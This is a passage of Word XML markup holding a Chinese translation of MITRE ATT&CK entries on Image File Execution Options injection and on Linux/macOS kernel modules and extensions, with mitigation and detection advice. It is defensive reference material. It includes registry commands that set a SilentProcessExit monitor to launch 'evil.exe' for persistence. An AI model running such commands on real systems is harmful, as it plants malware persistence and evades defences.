          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52372BE0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299B002D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\temp\evil.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6282FC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类似于进程注入，这些值可能会被滥用以获得持久性和权限提升，因为它们会导致在计算机上不同进程的上下文中加载和运行恶意可执行文件。安装图像文件执行选项的方法还可能通过连续调用提供持久性存储。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7047BFB5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意软件还可以通过注册无效的调试器来利用图像文件执行选项进行防御规避，这些调试器会转向并有效地禁用各种系统和安全应用程序。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B926B82" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B330B4F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF332F" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40458834" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007E30B0" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="007E30B0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于这种攻击技术是基于系统功能的滥用，因此无法通过预防性控制来轻易缓解。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4686F6B3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B319A1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控在异常父进程下创建的正常进程，或者具有调试性的进程创建标识，比如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>DEBUG_PROCESS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>DEBUG_ONLY_THIS_PROCESS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEAFED7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控与安装图像文件执行选项有关联的注册表值</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以及监控进程静默退出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还有与已知软件、补丁程序等不相关的修改。监视和分析与注册表编辑有关的应用程序编程接口（</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）调用，比如</w:t>
      </w:r>
      <w:r>
        <w:t>regcreatekeyex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>regsetvalueex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313F77A4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00380E97">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内核模块和扩展</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="1781E236" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6ADD9A07" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007E30B0" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007E30B0">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="007E30B0">
              <w:t xml:space="preserve"> T1215</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="526AFB5F" w14:textId="352E4074" w:rsidR="000F2665" w:rsidRPr="007E30B0" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="007E30B0">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="007E30B0">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D3A5D07" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007E30B0" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007E30B0">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="007E30B0">
              <w:t xml:space="preserve"> Linux, macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="730FB67F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007E30B0" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007E30B0">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="007E30B0">
              <w:t xml:space="preserve"> root</w:t>
            </w:r>
            <w:r w:rsidRPr="007E30B0">
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CD92823" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007E30B0" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007E30B0">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="007E30B0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统调用，进程监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71E5A63F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007E30B0" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007E30B0">
              <w:t>贡献者</w:t>
            </w:r>
            <w:r w:rsidRPr="007E30B0">
              <w:t>: Jeremy Galloway; Red Canary</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1227AF6F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E5159D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007E30B0">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="007E30B0">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6CCFDD86" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D724873" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可加载内核模块（或</w:t>
      </w:r>
      <w:r>
        <w:t>LKM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）是可以根据需要加载和卸载到内核中的代码片段。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>它们扩展了内核的功能，而无需重启系统。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如，一种类型的模块是设备驱动程序，它允许内核访问连接到系统的硬件。当恶意使用时，可加载内核模块（</w:t>
      </w:r>
      <w:r>
        <w:t>LKM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）可以是一种以最高操作系统权限运行的内核模式</w:t>
      </w:r>
      <w:r>
        <w:t>Rootkit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>Ring 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可以使用可加载的内核模块隐藏在系统上并逃避防御。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现了一些在野案例，并且还有开源项目。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24525DD6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基于</w:t>
      </w:r>
      <w:r>
        <w:t>LKM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>rootkit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的常见功能包括：隐藏自身，选择性隐藏文件，进程和网络活动，以及日志篡改，提供经过身份验证的后门以及对非特权用户启用</w:t>
      </w:r>
      <w:r>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限访问。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E6B08A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>内核扩展（也称为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>kext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>）用于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>macOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>将功能加载到类似于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>LKMs for Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>的系统上。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>它们通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>kextload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>kextunload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>命令加载和卸载。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>已经发现了几个可以使用它的例子。发现了一些在野的例子。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0F50C8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2524"/>
        <w:gridCol w:w="7212"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00557D03" w14:paraId="04884192" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2524" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="759B00C3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00557D03" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7212" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="56793F8F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00557D03" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00557D03">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="75611F42" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2524" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A4831BD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007E30B0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>杀毒</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>软件</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:t>反</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>恶意软件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7212" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EA9063D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>检测</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>Linux rootkit</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>的常用工具包括：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>rkhunter</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>chrootkit</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>rootkit</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>甚至</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>可能被设计用来逃避某些检测工具</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="1EC5D522" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2524" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29F923A9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行预防</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7212" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55D9C776" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>应用程序白名单和软件限制工具（如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>SELinux</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>）也可以帮助限制内核模块加载</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="3648B9FD" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2524" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="268E35F8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>特权账户管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7212" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38B942E9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>限制对</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>root</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>帐户的访问，并通过适当的权限分离和限制</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>提升权限的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>机会来阻止用户加载内核模块和扩展</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
